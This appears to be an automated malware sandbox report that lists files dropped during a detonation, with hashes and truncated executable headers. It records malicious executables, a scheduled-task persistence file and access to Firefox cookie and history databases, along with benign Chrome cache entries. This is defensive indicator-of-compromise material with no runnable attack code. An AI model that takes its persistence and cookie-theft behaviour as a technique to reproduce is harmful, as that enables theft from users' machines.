                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttenvous.5jk.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ut2bzk22.uit.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0e5mqi2.zom.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqr2j2ta.qtx.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytu4ttwv.fwg.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\Documents\GIIIIJDHJE.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):284
                                                                                                                                                                                                                        Entropy (8bit):3.415343287993195
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:0/dwmnVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lbtWEt0:0/d5nRf2RKQ1CGAFAjzvYRQVb9t0
                                                                                                                                                                                                                        MD5:74472D9195FCC86C59B2B985CBEAD58D
                                                                                                                                                                                                                        SHA1:4EB026943C1ED73636A89A71D3B45020DF84F1D3
                                                                                                                                                                                                                        SHA-256:9C371F118D8169D7DEBE0245D315BD893133A64543D1E4F8A305105D97723F6F
                                                                                                                                                                                                                        SHA-512:D7410294AADCF2E16118A03A89D5FEAF9A61A0BD690EAA240764BDFBFF5D7B1D84170F2C5CE1CC93F9E8FFFBF54F7DDFFFB974E1066B54893E92E9E3B29C4000
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.....43M..@.......F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................1.@3P.........................

                                                                                                                                                                                                                        C:\YQNZByFp\jyidkjkfhjawd.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                        Entropy (8bit):7.989392691400588
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:tI05w/i0EgOp2bAntruwSB/n5FqAmHrnaNWQu2/O7pOuSLBLX:tI05w/i0Ed2buawK/qAmLGWx7pOLLBz
                                                                                                                                                                                                                        MD5:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                        SHA1:5BDF461219E68AA7175A5FA01962AF8E3F583C7E
                                                                                                                                                                                                                        SHA-256:F7846A193C00E22D512FDC71FCA6FB3F3AF434179681D26700B11B7F4E69AB64
                                                                                                                                                                                                                        SHA-512:BFB8DFA87AAF0DC9AFD3AE19C6082A53917501899F582DDC10A56A311B9504A64F25C1B923ABE0B5077CEF64F6EF891089358D652E4A7618DACA9418BAD03017
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg.............................$............@...........................;...........@................................. P-..............................P-.........................................................................................................................@............0... ......."..............@................P...2...0..............@............@...0...$...b..............@.............'..p......................@....data....P...P-..P...@..............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        Chrome Cache Entry: 142

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (831)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):836
                                                                                                                                                                                                                        Entropy (8bit):5.159614252207021
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:/cPwWXV9prcrmBHslgT9lCuABAT2uoB7HHHHHHHYqmffffffo:EYWjpPKlgZ01BASuSEqmffffffo
                                                                                                                                                                                                                        MD5:B680E9EF55A469440AC0E03761023CE5
                                                                                                                                                                                                                        SHA1:824EC45A1CBE6A49D737CCB571B6F4CFBE54E1A5
                                                                                                                                                                                                                        SHA-256:F17E9B77C6F608AF3029F07EC8C93F4C46871A5CBD6C07999C16E289CFE9CF40
                                                                                                                                                                                                                        SHA-512:23FED994F770C03438A89122D2310D276D0A9FA01FA938FD3D32941CC68B3F8A153A037DDDF5755FA0558600E64D234F5C7B85F28F5C083113D0243C8AEB92B7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                        Preview:)]}'.["",["big lots closing stores","vexbolts tiktok live follower count","6th generation fighter jets china","whatsapp 2025","tennessee vols football mike matthews","polar vortex weather forecast","earth magnetic field","nyt crossword clues"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":1543028498608735003,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                        Chrome Cache Entry: 143

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):117446
                                                                                                                                                                                                                        Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                        MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                        SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                        SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                        SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                        Chrome Cache Entry: 144

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                        Chrome Cache Entry: 145

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):132768
                                                                                                                                                                                                                        Entropy (8bit):5.4371263615588425
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:fLkJQ7O4N5dTm+syHEt4W3XdQ4Q6PuSr/nUW2i6o:fOQ7HTt/sHdQ4Q6PDfUW8o
                                                                                                                                                                                                                        MD5:8F92E8E0047B7B802A8C5D230575F66F
                                                                                                                                                                                                                        SHA1:BA6D2351736BC0B3B1BA89B8ECB84CEACA0A19D3
                                                                                                                                                                                                                        SHA-256:B9BD43587F4547E5B411C10C772C48791B1802D33209A1161F30F220B7066469
                                                                                                                                                                                                                        SHA-512:8769099537EDF8E183B59EA6C1ABEDEF894D733ECC5B08F3A892F33283452BB03168C64E74ED9238E506E66F576A892EF6DFDC1926ACDBB5D8736965CCE530FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                        Chrome Cache Entry: 146

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):175897
                                                                                                                                                                                                                        Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                        MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                        SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                        SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                        SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                        Chrome Cache Entry: 147

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):5162
                                                                                                                                                                                                                        Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                        MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                        SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                        SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                        SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
